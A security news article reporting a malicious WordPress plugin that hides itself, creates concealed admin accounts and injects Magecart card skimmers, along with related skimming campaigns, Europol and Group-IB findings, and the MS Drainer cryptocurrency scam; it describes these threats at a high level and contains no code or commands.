Security analysts have recently discovered a malicious WordPress plugin posing a significant threat to e-commerce websites. This rogue plugin is designed to create unauthorized administrator accounts and inject harmful JavaScript code to steal sensitive credit card information, as part of a broader Magecart campaign, according to reports from Sucuri.
Deceptive Tactics and Concealment
The deceptive plugin masquerades as a ‘WordPress Cache Addons,’ employing common tactics used by malicious plugins to appear legitimate. It typically infiltrates WordPress sites through compromised admin users or by exploiting vulnerabilities in existing plugins.
Once installed, the plugin cleverly duplicates itself into the mu-plugins (must-use plugins) directory, ensuring automatic activation while concealing its presence from the admin panel. Manual removal becomes challenging due to the plugin’s efforts to prevent such actions, including unregistering callback functions for hooks typically used by similar plugins.
Additionally, the rogue plugin provides an option to create and hide an administrator user account, avoiding detection and maintaining prolonged access to the target site. The ultimate goal of this campaign is to inject credit card-stealing malware into checkout pages, with the stolen information transmitted to a domain controlled by threat actors.
Security Community Warnings and Ongoing Threats
Security researcher Ben Martin underscores the significance of compromised administrator users in WordPress infections. The attackers strategically work within these access constraints, exploiting the ability to install plugins as a key method to compromise WordPress admin privileges.
This revelation follows a prior warning from the WordPress security community about a phishing campaign tricking users into installing a plugin under the guise of a security patch. The malicious plugin not only creates an admin user but also deploys a web shell for persistent remote access.
Sucuri indicates that the threat actors behind this campaign leverage the “RESERVED” status associated with a CVE identifier, hinting at a yet-to-be-disclosed security flaw.
Additional Magecart Campaigns and Europol’s Insights
Simultaneously, Sucuri has identified another Magecart campaign utilizing the WebSocket communications protocol to insert skimmer code on online storefronts. This variant activates upon clicking a deceptive “Complete Order” button superimposed on the genuine checkout button.
Europol’s recent report on online fraud emphasizes the persistent threat of digital skimming, noting a shift from front-end to back-end malware, making detection more challenging. The agency has also notified 443 online merchants of compromised credit card data due to skimming attacks.
Global Impact and Cryptocurrency Drainer
Group-IB, in collaboration with Europol, has uncovered 23 JS-sniffer families involved in cybercrime operations across Europe and the Americas. These sniffer families, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, targeted companies in 17 countries.
Malicious ads on Google Search and Twitter have been found promoting a cryptocurrency drainer named MS Drainer. This attacker is estimated to have siphoned $58.98 million from 63,210 victims since March 2023 through a network of 10,072 phishing websites. ScamSniffer highlights the attackers’ ability to target specific audiences at a low cost through Google search terms and audience profiling.